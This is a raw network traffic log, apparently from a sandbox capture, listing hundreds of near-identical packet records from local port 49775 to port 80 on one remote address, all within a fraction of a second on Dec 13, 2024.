                                                                                                                                                                Dec 13, 2024 01:37:36.131915092 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.131930113 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.131951094 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.131964922 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.131985903 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132002115 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132025957 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132040977 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132061005 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132077932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132101059 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132121086 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132138968 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132157087 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132177114 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132190943 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132204056 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132222891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132251978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132271051 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132297993 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132311106 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132435083 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132466078 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132482052 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132507086 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132524967 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132550955 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132565022 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132584095 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132611990 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132632017 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132648945 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132671118 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132693052 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132710934 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132774115 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132800102 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132814884 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132836103 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132849932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132882118 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132896900 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132919073 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132960081 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132960081 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132977962 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.132998943 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133018017 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133044004 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133058071 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133078098 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133099079 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133120060 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133133888 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133230925 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133248091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133287907 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133315086 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133330107 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133352041 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133367062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133394957 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133409023 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133447886 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133472919 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133500099 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133513927 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133539915 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133553982 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133578062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133594036 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133615971 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133651972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133676052 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133691072 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133785009 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133811951 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133846045 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133861065 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133886099 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133899927 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133920908 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.133996964 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134016037 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134038925 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134057045 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134129047 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134129047 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134145975 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134167910 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134182930 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134202957 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134229898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134255886 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134270906 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134298086 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134315014 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134335995 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134350061 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134370089 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134382963 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134406090 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134424925 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134438992 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134463072 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134478092 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134500980 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134515047 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134537935 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134551048 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134577990 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134591103 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134613037 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134627104 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134649992 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134664059 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134691000 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134717941 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134731054 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134748936 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134762049 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134785891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134802103 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134826899 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134841919 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134862900 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134876013 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134901047 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134915113 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134938002 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134952068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134974003 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.134989023 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135015011 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135029078 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135047913 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135061979 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135086060 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135101080 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135121107 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135134935 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135154963 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135168076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135193110 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135206938 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135230064 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135272026 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135272026 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135288000 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135297060 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135329008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135329008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135426998 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135502100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135518074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135540962 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135591984 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135621071 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135634899 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135658026 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135673046 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135700941 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135715008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135740995 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135767937 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135782003 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135802984 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135817051 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135839939 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135854006 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135874033 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135889053 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135910034 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135924101 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135943890 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135957956 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135977983 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.135993004 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136012077 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136212111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136225939 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136249065 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136274099 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136287928 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136307001 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136321068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136344910 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136358976 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136379957 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136394978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136415005 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136429071 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136450052 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136464119 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136483908 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136497974 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136517048 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136533022 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136554956 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136571884 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136593103 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136679888 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136703968 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136718035 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136739969 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136759043 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136775017 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136846066 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136861086 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136882067 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136897087 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136945963 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136977911 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.136996031 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137022972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137037039 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137068033 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137083054 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137108088 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137123108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137144089 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137156963 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137178898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137192965 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137212992 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137228012 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137248039 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137263060 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137290001 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137305021 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137430906 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137469053 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137495041 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137509108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137535095 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137547970 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137576103 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137590885 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137614965 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137629032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137654066 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137670040 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137701988 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137718916 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137746096 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137881994 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137912035 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.137931108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138034105 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138034105 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138051033 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138070107 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138123035 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138150930 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138164997 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138197899 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138223886 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138251066 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138266087 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138290882 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138305902 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138329029 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138343096 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138364077 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138379097 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138396978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138458967 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138484955 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138506889 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138521910 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138554096 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138580084 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138602018 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138619900 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138636112 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138664007 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138678074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138705015 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138719082 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138742924 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138756037 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138783932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138798952 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138823032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138953924 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138978004 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.138993979 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139095068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139110088 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139208078 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139239073 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139266968 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139292002 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139307976 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139331102 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139347076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139364958 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139388084 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139400959 CET4977580192.168.2.5185.81.68.147
